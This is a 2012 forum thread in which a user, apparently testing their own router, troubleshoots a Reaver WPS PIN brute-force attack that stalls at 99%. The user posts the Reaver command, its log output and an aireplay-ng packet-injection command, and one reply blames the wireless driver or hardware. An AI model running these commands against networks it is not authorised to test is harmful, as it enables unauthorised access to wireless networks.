Paid Advertising is
ha.ckers sla.cking
For 802.11 and bluetooth security people alike. Latest trends, attack surface issues, and prevention. How wireless security is becoming the new vector to hacking corporate websites and applications. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Reaver WPS transaction failed at 99%
Posted by: para
Date: July 20, 2012 08:45AM

I tried reaver out on my own router like this.
reaver -i mon0 -b [the_mac] -vv --win7 -d 2
I left it running for a few hours.
It got to 99% or so it said.
Then it started saying stuff like this:
[+] Trying pin [whatever]
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WPS transaction failed (code: 0x03), re-trying last pin

shutdown reaver started it again
now it won't associate with the router

I tried injecting packets with aircrack
aireplay-ng -1 0 -a [the_mac] mon0

05:41:14 Sending Authentication Request (Open System)

05:41:16 Sending Authentication Request (Open System)

05:41:18 Sending Authentication Request (Open System)
and it just kept going like that forever not associating.
I later tweaked the reaver parameters -d between 0 and 100 and played with the NACK parameter, no difference
I turned the router off and on again and now aircrack works
reaver also associates but when trying the pin the same errors occur and then the cycle repeats itself.
It worked fine up tu 99.9%
Does anyone know what the problem might be and how I can solve it?

Thank you
the router has wps activated it is a Trendnet router.

Options: ReplyQuote
Re: Reaver WPS transaction failed at 99%
Posted by: id
Date: July 24, 2012 07:27AM

most likely an issue with the wireless chip driver or hardware.


Options: ReplyQuote

Sorry, only registered users may post in this forum.